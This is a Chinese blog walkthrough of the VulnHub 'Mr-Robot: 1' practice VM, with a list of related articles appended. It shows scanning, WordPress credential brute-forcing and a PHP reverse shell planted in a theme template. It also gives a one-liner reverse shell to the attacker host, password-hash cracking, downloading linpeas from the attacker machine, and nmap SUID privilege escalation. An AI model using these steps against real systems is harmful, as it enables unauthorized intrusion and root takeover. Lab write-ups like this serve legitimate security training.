vulnhub Mr-Robot: 1

最新推荐文章于 2024-01-06 23:48:57 发布
最新推荐文章于 2024-01-06 23:48:57 发布
阅读量1.8k 收藏 4
点赞数
分类专栏: vulnhub 文章标签: vulnhub wordpress nmap提权 网络安全 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/121753760
版权

本文思路

nmap扫描开放端口-->dirb扫描网站目录-->查看robots.txt拿到第一个key,并下载字典文件-->爆破WordPress用户名和密码-->通过WordPress的模板编辑功能获得daemon用户反弹shell-->通过权限设置不当的密码文件获得robot用户的密码,并得到第二个key-->通过nmap提权,并得到第三个key

具体步骤

步骤1:nmap扫描

sudo nmap -sS -A -p- 192.168.9.239

扫描到ssh(22端口)是关闭的、http(80端口)和https(443端口)是打开的 ,看样子估计还是从网页突破。

步骤2:dirb扫描网站目录,通过robots.txt拿到第一个key

dirb http://192.168.9.239/

扫描结果特别多,就不截图了,总的来说分为5部分:

(1)直接访问ip可以访问到的页面

 (2)http://192.168.9.239/0/   是一个wordpress

(3)http://192.168.9.239/phpmyadmin  从远端没法登录,只能从本地登录

(4)http://192.168.9.239/admin/   访问就卡在这个页面不停刷新,暂时不知道怎么用

(5)http://192.168.9.239/robots 包含两个文件 fsocity.dic 和 key-1-of-3.txt

访问 http://192.168.9.239/key-1-of-3.txt 得到如下结果:

看来本靶机有3个key,目前已经轻松拿到一个了。

步骤3:下载字典fsocity.dic

访问http://192.168.9.239/fsocity.dic发现像是一个字典

把这个字典拷贝下来保存为fsocity.txt,备用

步骤4:爆破WordPress用户名密码

http://192.168.9.239/0/​​​​​​上找到登录界面http://192.168.9.239/wp-login.php,尝试登录发现登录失败提示还挺详细,还提示用户名有误。

这样的话,用户名是可爆破的,因为用户名和密码错误的提示信息不同。

用刚刚保存的密码字典fsocity.txt和burpsuite来爆破用户名。

登录的过程中抓包,send to intruder, 爆破点设置为log的值

payload导入fsocity.txt

爆破结果按长度(Length)排序,字典很大,不用等爆破结束,已经可以看到用户名基本就是elliot大小写变化。

然后把爆破位置换到pwd的值

payload还是用fsocity.txt。爆破半天没爆出来,看了网上的wp发现密码是ER28-0652。

在fsocity.txt里面找了一下,ER28-0652确实是在的,只是在第八十几万个-_-|||

不等了,我把最后二十几个单拎出来,跑了一下,结果按Length排序,确实可以爆出来密码ER28-0652

步骤5:利用WordPress的模板编辑功能getshell(daemon用户)

使用用户名elliot密码ER28-0652登录http://192.168.9.239/wp-login.php

进入到http://192.168.9.239/wp-admin/

依次点击左侧栏的AppearanceEditor,以及右侧栏的404 Template

来到http://192.168.9.239/wp-admin/theme-editor.php?file=404.php&theme=twentyfifteen 

攻击机上用nc监听2333端口

nc -lvp 2333

在kali linux的/usr/share/webshells/php/目录下找到php-reverse-shell.php,这是一个php反弹shell。把里面的内容拷贝到上图页面中get_header(); ?>的下方,修改$ip和$port为攻击机监听反弹shell的ip和端口。点击Update File进行保存。

访问一个不存在的页面,比如 http://192.168.9.239/wp-admin/1

攻击机上获得反弹shell

其实这边有一个疑问,用chrome插件Hack-Tools生成的简单php反弹shell是没法成功反弹的

php -r '$sock=fsockopen(getenv("192.168.9.10"),getenv("2333"));exec("/bin/sh -i <&3 >&3 2>&3");'

后来用上述kali linux自带的php反弹shell得到shell之后,尝试了一下直接在shell中执行上述一句话反弹shell,也是执行不成功的,报错信息如下,但具体原因目前不清楚。

在得到的反弹shell中输入如下命令,得到交互式(好像是半交互式)的shell

python -c 'import pty; pty.spawn("/bin/bash")'

 

步骤6:得到robot用户的shell,拿到第二个key

进入目录home/robot,下面有两个文件

key-2-of-3.txt中应该是第二个key,但是只有robot用户可以查看这个文件。

password.raw-md5是所有用户可读的,从文件名猜测是robot用户的md5加密的密码。

cat password.raw-md5

把md5加密的密码拿到MD5免费在线解密破解_MD5在线加密-SOMD5解密

得到robot用户明文密码abcdefghijklmnopqrstuvwxyz

反弹shell中输入

su robot

然后输入密码abcdefghijklmnopqrstuvwxyz,得到robot用户的shell

输入

cat key-2-of-3.txt

得到第二个key

步骤7:下载运行linpeas.sh

由于robot用户没有自己家目录的write权限,所以先到有write权限的/tmp目录

cd /tmp

攻击机上在存放linpeas.sh的目录下开http服务

python -m SimpleHTTPServer 80

 然后靶机shell中输入如下命令,从攻击机上下载linpeas.sh

wget http://192.168.9.10/linpeas.sh

修改linpeas.sh权限,使robot用户可执行

chmod 744 linpeas.sh

运行linpeas.sh

./linpeas.sh

运行结果有提示可用的CVE,但是试了好几个exp,没有一个可用的。

步骤8:通过nmap提权,拿到第三个key

仔细看linpeas.sh的结果发现suid结果那边给了一个有95%利用可能性的提示--nmap命令

在网站GTFOBins 搜一下nmap,可以搜到利用方法

即在robot的shell中输入

nmap --interactive

再输入

!sh

如此便可得到root权限。有意思的是,从id命令的结果看,目前的实际用户虽然还是robot,但有效用户已经变成root了。 

 

到/root目录下,可以看到第三个key文件key-3-of-3.txt

成功获得第三个key

 

仙女象
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
提权信息收集自动化脚本-LinPEAS
04-10
该工具是纯bash脚本,通用性很好,能够收集上述几乎所有的提权信息,足够全面。但运行时间长,效率低,得到的信息虽然全面,但重点不够突出,有较多无用信息,稍显冗杂。 使用方式为: ./linpeas.sh
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 1937
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
Linpeas的简单使用
最新发布
Themanager112的博客
01-06 1306
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
网络安全】记一次红队渗透实战项目
kali_Ma的博客
01-30 9007
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件。没发现新的东西,但是可看到devops的ID为1002是共用的!lang= ,出现这种形式,很可能是sql注入或文件包含。
网络安全】记一次红队渗透实战项目_渗透测试红队
xnxqwzy的博客
07-14 315
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集。
Nimmi-Robot:电报组管理机器人
03-18
尼米机器人 电报组管理机器人
dingtalk-robot:钉钉机器人消息推送 Nodejs SDK
04-28
用法1.0 安装模块npm i dingtalk-robot-sender --save1.1 创建机器人实例const ChatBot = require('dingtalk-robot-sender');// 直接使用 webhookconst robot = new ChatBot({ webhook: '...
bing-wallpaper-robot:Bing壁纸机器人-:robot:收集Bing壁纸数据
04-03
简介通过Github Action,每日自动记录Bing壁纸数据。免则声明此项目仅用于个人娱乐,所有内容版权均属于Bing,请勿用于商业用途。 由Tony制造()
puppeteer-robot::robot:基于 Puppeteer 所构建的简易机器人,以帮助自动化完成些精确性事务
05-22
木偶机器人 :robot: 一个由Puppeteer构建的简单机器人,可帮助自动化一些精确的东西。English |目标与理念在这个数字信息的智能时代,即使是个人,也有必要使用各种工具来创建自己的自动化机器人来帮助完成一些精确...
RL-ROBOT:机器人技术的强化学习框架
04-27
试试RL-ROBOT: import exp import rlrobot exp.ENVIRONMENT_TYPE = "MODEL" # "VREP" for V-REP simulation exp.TASK_ID = "wander_1k" exp.FILE_MODEL = exp.TASK_ID + "_model" exp.ALGORITHM = "TOSL" exp....
Exploits:LinuxWindows漏洞利用
04-16
漏洞利用 卡利Linux 安装终结者 sudo apt-get update sudo apt-get install terminator 使用终止符 #Start Terminator #horizontal break ctrl+shift+e #Vertical break ctrl+shift+o 安装/下载linpeas.sh(系统检查器) Download linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/lin
工具箱:CTF工具箱
02-14
工具箱 当前,工具箱提供的功能类似于python3 -m http.server ,它将: 在提供的目录中提供文件 服务常用的CTF工具,例如linpeas.sh和静态二进制文件 服务有效载荷/外壳生成 正在安装 git clone https://github.com/AlanFoster/toolbox.git 安装依赖项: cd toolbox git submodule update --init --recursive pip3 install -r requirements.txt 验证它是否有效: python3 toolbox.py --help 使用Docker 构建图像: docker build -t toolbox . 用法示例: docker run -it --rm -p 8000:8000 toolbox /bin/sh -c "python to
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 477
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2207
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
全平台系统提权辅助工具 PEASS-ng
LuckySec
04-27 6224
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 权限提升清单 WinPEAS - Windows 本地权限提权脚本(C#.exe
网络安全——Web目录扫描
weixin_54055099的博客
09-01 4613
Web目录扫描
vulnhub Tr0ll: 2
箭雨镜屋
12-30 2337
本文思路: nmap扫描---->dirb扫描发现robots---->dirb配合找到的字典爆破目录---->访问目录下载图片---->strings考察图片,发现新目录y0ur_self---->访问y0ur_self目录,获得字典answer.txt---->弱口令登录ftp---->用fcrackzip爆破lmao.zip密码---->通过密钥ssh登录,得到noob用户的shell---->linpeas.sh探测提权途径---->利用缓冲区溢出漏洞提权
dirb网站目录扫描工具详解
有勇气的牛排博客
07-29 5906
1 介绍 有勇气的牛排 — 攻防 Kali Linux提供一款基于字典的Web目录扫描工具DIRB。该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站。该工具还提供两个命令,帮助用户从网页生成字典,或者生成定制字典。 1.1 什么是dirb DIRB 是一个基于命令行的工具,可以根据单词列表对任何目录进行暴力破解。 DIRB 会发出一个 HTTP 请求,并查看每个请求的 HTTP 响应代码 1.2 如何工作
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1180
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
Error response from daemon: Cannot restart container my-robot: driver failed programming external connectivity on endpoint my-robot (5b7b832116e0ac20c4a7bc52ccabc1417b72e03237190c1dba3ab80aab923292): Bind for 0.0.0.0:8111 failed: port is already allocated
07-12
1. 更改容器中的端口:如果你可以修改容器的配置文件或命令行参数,尝试将容器的端口更改为一个没有被占用的端口,比如 8112。 2. 停止占用该端口的进程或容器:使用以下命令查找占用端口 8111 的进程或容器的 PID...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值